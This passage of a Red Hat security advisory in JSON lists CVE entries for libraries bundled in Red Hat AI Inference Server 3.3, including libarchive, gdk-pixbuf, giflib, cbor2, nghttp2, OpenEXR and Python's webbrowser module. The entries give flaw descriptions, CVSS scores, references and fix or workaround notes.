"summary": "https://github.com/python/cpython/pull/143931",
"url": "https://github.com/python/cpython/pull/143931"
},
{
"category": "external",
"summary": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/"
}
],
"release_date": "2026-03-20T15:08:32.576000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-5121",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-30T07:40:25.358335+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2452945"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: An integer overflow flaw in `libarchive` on 32-bit systems can lead to a heap buffer overflow. This vulnerability occurs when processing a specially crafted ISO9660 image, allowing an attacker to potentially execute arbitrary code. Red Hat Enterprise Linux 64-bit systems are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "RHBZ#2452945",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc",
"url": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2934",
"url": "https://github.com/libarchive/libarchive/pull/2934"
}
],
"release_date": "2026-03-30T07:44:15.222000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "To mitigate this issue, avoid processing untrusted ISO9660 images with applications that utilize `libarchive`. Users should only extract or read content from ISO images obtained from trusted sources.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing"
},
{
"acknowledgments": [
{
"names": [
"Ka\u011fan \u00c7apar"
]
}
],
"cve": "CVE-2026-5201",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2026-03-31T07:17:23.696000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2453291"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An Important heap-based buffer overflow flaw exists in the `gdk-pixbuf` library\u0027s JPEG image loader. This vulnerability can be triggered automatically without user interaction when processing a specially crafted JPEG image, such as during thumbnail generation. Successful exploitation leads to application crashes and denial-of-service conditions in applications utilizing `gdk-pixbuf` for image handling.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "RHBZ#2453291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5201",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5201"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304",
"url": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304"
}
],
"release_date": "2026-03-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "To reduce the risk of exploitation, avoid opening or processing untrusted JPEG image files. This operational control helps prevent the automatic triggering of the vulnerability, for example, during thumbnail generation, which could otherwise lead to application instability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image"
},
{
"cve": "CVE-2026-23868",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2026-03-10T20:01:10.215637+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "giflib: Giflib: Double-free vulnerability leading to memory corruption",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "RHBZ#2446207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23868",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23868"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7",
"url": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7"
},
{
"category": "external",
"summary": "https://www.facebook.com/security/advisories/cve-2026-23868",
"url": "https://www.facebook.com/security/advisories/cve-2026-23868"
}
],
"release_date": "2026-03-10T18:53:25.606000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "giflib: Giflib: Double-free vulnerability leading to memory corruption"
},
{
"cve": "CVE-2026-26209",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-23T19:02:13.009646+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450422"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in cbor2, a library for encoding and decoding Concise Binary Object Representation (CBOR) data. A remote attacker can exploit this vulnerability by sending a specially crafted CBOR payload containing deeply nested structures. This can cause the application to crash due to uncontrolled recursion, leading to a complete Denial of Service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cbor2: cbor2: Denial of Service due to uncontrolled recursion via crafted CBOR payloads",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26209"
},
{
"category": "external",
"summary": "RHBZ#2450422",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450422"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26209"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26209",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26209"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b",
"url": "https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/pull/275",
"url": "https://github.com/agronholm/cbor2/pull/275"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/releases/tag/5.9.0",
"url": "https://github.com/agronholm/cbor2/releases/tag/5.9.0"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642",
"url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642"
}
],
"release_date": "2026-03-23T18:53:10.268000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cbor2: cbor2: Denial of Service due to uncontrolled recursion via crafted CBOR payloads"
},
{
"cve": "CVE-2026-27135",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2026-03-18T19:02:13.823002+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448754"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "RHBZ#2448754",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448754"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27135"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1",
"url": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6",
"url": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6"
}
],
"release_date": "2026-03-18T17:59:02.045000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination"
},
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
